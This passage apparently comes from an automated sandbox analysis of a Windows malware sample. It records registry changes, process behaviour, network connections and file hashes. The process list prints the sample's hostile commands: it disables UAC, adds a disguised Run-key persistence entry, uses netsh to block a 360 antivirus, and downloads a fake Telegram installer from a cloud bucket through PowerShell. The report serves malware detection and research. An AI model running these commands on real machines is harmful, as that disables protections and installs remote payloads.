| Set value (str) | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tdesktop.tonsite\DefaultIcon\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe,1\"" | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tdesktop.tonsite\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe\" -- \"%1\"" | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tonsite\DefaultIcon\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe,1\"" | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tdesktop.tg | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tdesktop.tg\shell | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tg\ = "URL:Telegram Link" | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tonsite | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\programdata\20250223024202\Agghosts.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-DUQG5.tmp\bin.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe
"C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Downloads\20250223024202\1.bat" "
C:\programdata\20250223024202\Agghosts.exe
"C:\programdata\20250223024202\Agghosts.exe"
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdata_Service /d "C:\programdata\lnk\dick.lnk" /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Videos\download_and_run.bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Downloads\20250223024202\fhq.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Block Program Network Access" dir=in action=block program="" enable=yes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://baba-1336130708.cos.ap-tokyo.myqcloud.com/tsetup-x64.5.11.1.exe', 'C:\Users\Public\Videos\bin.exe')"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Block Program Network Access" dir=out action=block program="" enable=yes
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Block Program Network Access2" dir=in action=block program="safemon\360tray.exe=360Safe.exe" enable=yes
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Block Program Network Access2" dir=out action=block program="safemon\360tray.exe=360Safe.exe" enable=yes
C:\Windows\system32\netsh.exe
netsh advfirewall set allprofiles state on
C:\Windows\system32\netsh.exe
netsh advfirewall set privateprofile settings inboundusernotification disable
C:\Windows\system32\netsh.exe
netsh advfirewall set publicprofile settings inboundusernotification disable
C:\Windows\system32\netsh.exe
netsh advfirewall set domainprofile settings inboundusernotification disable
C:\Users\Public\Videos\bin.exe
"C:\Users\Public\Videos\bin.exe"
C:\Users\Admin\AppData\Local\Temp\is-DUQG5.tmp\bin.tmp
"C:\Users\Admin\AppData\Local\Temp\is-DUQG5.tmp\bin.tmp" /SL5="$1301F8,46193823,827904,C:\Users\Public\Videos\bin.exe"
C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe
"C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | baba-1336130708.cos.ap-tokyo.myqcloud.com | udp |
| JP | 43.128.240.48:443 | baba-1336130708.cos.ap-tokyo.myqcloud.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.27.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| N/A | 127.0.0.1:56118 | tcp | |
| US | 8.8.8.8:53 | www.baidu.com | udp |
| CN | 103.235.47.188:80 | www.baidu.com | tcp |
| US | 8.8.8.8:53 | spoutry.it.com | udp |
| JP | 118.107.15.176:8081 | spoutry.it.com | tcp |
| JP | 43.128.240.48:443 | baba-1336130708.cos.ap-tokyo.myqcloud.com | tcp |
| NL | 149.154.167.51:443 | tcp | |
| NL | 95.161.76.100:443 | tcp | |
| NL | 149.154.167.51:80 | 149.154.167.51 | tcp |
| NL | 95.161.76.100:80 | 95.161.76.100 | tcp |
| US | 8.8.8.8:53 | td.telegram.org | udp |
| NL | 149.154.167.99:443 | td.telegram.org | tcp |
| NL | 149.154.167.91:443 | tcp | |
| NL | 149.154.167.51:443 | tcp | |
| NL | 95.161.76.100:443 | tcp | |
| NL | 149.154.167.91:80 | 149.154.167.91 | tcp |
| NL | 149.154.167.51:80 | 149.154.167.51 | tcp |
| NL | 95.161.76.100:80 | 95.161.76.100 | tcp |
| SG | 149.154.171.5:443 | tcp | |
| US | 8.8.8.8:53 | dns.google.com | udp |
| SG | 149.154.171.5:80 | 149.154.171.5 | tcp |
| US | 8.8.8.8:443 | dns.google.com | tcp |
| NL | 95.161.76.101:443 | tcp | |
| US | 8.8.8.8:53 | dns.google.com | udp |
| US | 8.8.8.8:53 | dns.google.com | udp |
| US | 8.8.8.8:53 | dns.google.com | udp |
| US | 8.8.8.8:53 | dns.google.com | udp |
| US | 8.8.8.8:53 | dns.google.com | udp |
| US | 8.8.8.8:53 | dns.google.com | udp |
| US | 8.8.8.8:53 | dns.google.com | udp |
Files
memory/396-11-0x0000000140000000-0x0000000140419000-memory.dmp
memory/396-12-0x000001E44BF00000-0x000001E44C314000-memory.dmp
memory/396-13-0x000001E44B980000-0x000001E44B981000-memory.dmp
memory/396-14-0x0000000140000000-0x0000000140419000-memory.dmp
C:\ProgramData\20250223024202\Agghosts.exe
| MD5 | 2a24dcd41bc3c5b5f7eceda525786578 |
| SHA1 | 7e898f9ee5a97a1a261326f0168e8de44dcf8af4 |
| SHA256 | 169e9e4b23878035551455f4e5dbd01ece204e59fe75361680e8786998059ca7 |
| SHA512 | aaded4c72d3fa77eefd9d4b098288dd6923bd79813466d93313d6acb00fea9bb90248fff92cc89a625c60ae3b7cc1c27e8bb178fdac624ec896267da57b9fd6a |
C:\Users\Public\Downloads\20250223024202\1.bat
| MD5 | fa42ebb1071abc0e618c296ea2cf71a6 |
| SHA1 | 9e0c0737b0e37b3e821d011eecd9b0c7c9f2a15a |
| SHA256 | 395f835731d25803a791db984062dd5cfdcade6f95cc5d0f68d359af32f6258d |
| SHA512 | 0ed9919675c224201996caeeecf625a1db00a70af5d3ba135dc3d6fa16bfcc562426c813e21b4e861f04d312635be3528d79b5c49b23e78161f2b051fa9aaf05 |
C:\programdata\20250223024202\libcef.dll
| MD5 | b7f8c3416cdfd6f46c790da064f66099 |
| SHA1 | d7ae9a3d49bbf1981e7d6604128e18b6cd160bd6 |
| SHA256 | b9edf03447cf402e24da384c146c9d1536871a47518c795c4aea6550e3abd94d |
| SHA512 | 24272954e57f4f4f81dad90469e84946549e3441ba599f8b819d069b803687b3da35f449c0f18755352dba208d6d63af1d6b53c0a56adbd36540b1537bb99dc7 |
C:\ProgramData\lnk\2.lnk
| MD5 | 97dd1e75e3378d3e5f4cb676787df4c5 |
| SHA1 | 9050ff87b70c2d534c1218113a3f5e3d971b4d90 |
| SHA256 | fc567936880543449bfc3c148219e3332db05554a2bfee030cade8f0ecc6b4ee |
| SHA512 | acf35d67939ff0281e66b1b281197a815eb932b79c18d121ec68a366509fd3aade0bde257ba0d22e9396b172d2a6915cc000a2e961fa701e9586b09d46e17655 |
memory/396-62-0x0000000140000000-0x0000000140419000-memory.dmp
memory/5056-63-0x0000000002BF0000-0x0000000002C19000-memory.dmp
C:\programdata\20250223024202\Ensup.log
| MD5 | 2fd94f6e1d71454d716a126f0d7450ac |
| SHA1 | 5d966df95c741880089e9078af921a22216516ec |
| SHA256 | a599cbb05b69328655a7a0afc2644ed607c30a05edfb8fd6be2ea920c25b54b5 |
| SHA512 | 340107b69fc49b8fe1acf37a3a6e40c4b7206cf3ae069fea6f4ba702a733401e1feef55e1d858b3529764bcd0ba371ef552f5838444b65b62545e1da150f9bb2 |
C:\Users\Public\Videos\download_and_run.bat
| MD5 | a90ccfd040d774b547f7d258b8e03661 |
| SHA1 | c46e353d34723f9393482974a516d51dfb52440d |
| SHA256 | d852cfc4107e9ce5bec7349ef180366bbb4fe0878e725325a2b844f93a1ac1e2 |
| SHA512 | bdc816781c44b6e9bbc8207a3c0466a45397cf7815f267add21abe243bf138b5bae7ffec867433bf249e139b726413f68b7002f541c89ae1a25bd1e6980abfd7 |
C:\Users\Public\Downloads\20250223024202\fhq.bat
| MD5 | 3a7cb580bd340505f6dc5b4c829a3eca |
| SHA1 | 21cc730517d74fa1d13316d7e0d817f3bd710906 |
| SHA256 | 1c1528b546aa29be6614707cbe408cb4b46e8ed05bf3fe6b388b9f22a4ee37e2 |
| SHA512 | c224fa676542b90f8fc990e574028af664dced61612855290fb23ce4acad2d6b9043e901365939106b591b6746b3e4ddada15eede88a947051e9d8083194e630 |
memory/1580-70-0x0000023494020000-0x0000023494042000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_h1zfqu1i.rz5.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Public\Videos\bin.exe
| MD5 | 06eaa3263801f4d695c3727834ffbca5 |
| SHA1 | 58031db0039cf00a1fe738e55ee2fca35558c4fd |
| SHA256 | 97969d6e01ee37a16f4f7f64e6166f169bedfe95190f48d426693d4b95e8e8ff |
| SHA512 | 7b03899c6ce403172eb6d159e142b8ac25ef3aa6eb7f56abd205657d13832eb5b8ee61408b8d7a6f3f1c57de7fcc2565ce2ce9ecb4e54611f4c48098a870b6b3 |
memory/4084-86-0x00000000002E0000-0x00000000003B8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-DUQG5.tmp\bin.tmp
| MD5 | 2e90747fe82d7271fbe97ea022fd5173 |
| SHA1 | 6164bc0ec0c908e9159a0c5d558945d7974e11c1 |
| SHA256 | bbec6b26c13b8ebfd01789a8248c6a45646134daf1ef998dbb885ec59157e6b4 |
| SHA512 | d9a797861f8a7fc966a0a00e1719734a23c95c39aca9d70322d09274119267c8bd0d86a3ec468a7f493422769f89a48469f1e33a6a1dd2d39cb30cfb4df6fa44 |
memory/4084-93-0x00000000002E0000-0x00000000003B8000-memory.dmp
memory/1712-94-0x0000000000150000-0x0000000000487000-memory.dmp
memory/1712-96-0x0000000000150000-0x0000000000487000-memory.dmp
memory/1712-105-0x0000000000150000-0x0000000000487000-memory.dmp
C:\Users\Admin\AppData\Roaming\Telegram Desktop\modules\x64\d3d\d3dcompiler_47.dll
| MD5 | a7349236212b0e5cec2978f2cfa49a1a |
| SHA1 | 5abb08949162fd1985b89ffad40aaf5fc769017e |
| SHA256 | a05d04a270f68c8c6d6ea2d23bebf8cd1d5453b26b5442fa54965f90f1c62082 |
| SHA512 | c7ff4f9146fefedc199360aa04236294349c881b3865ebc58c5646ad6b3f83fca309de1173f5ebf823a14ba65e5ada77b46f20286d1ea62c37e17adbc9a82d02 |
memory/1712-126-0x0000000000150000-0x0000000000487000-memory.dmp
memory/4084-127-0x00000000002E0000-0x00000000003B8000-memory.dmp